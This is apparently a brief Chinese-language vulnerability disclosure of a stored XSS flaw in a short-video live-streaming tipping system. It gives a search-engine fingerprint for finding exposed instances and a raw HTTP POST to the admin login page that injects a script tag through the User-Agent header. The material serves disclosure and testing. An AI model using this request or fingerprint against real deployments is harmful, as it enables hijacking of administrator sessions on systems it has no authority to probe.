短视频直播打赏系统存在存储型XSS漏洞
一、漏洞简介
短视频直播打赏系统存在存储型XSS漏洞
二、影响版本
- 短视频直播打赏系统
三、资产测绘
"Location: https://m.baidu.com" && domain!="baidu.com"
四、漏洞复现
POST /admin/login/index.html HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: 1234<script>alert("niubi")</script>
username=admin1&password=123123123&keep_login=0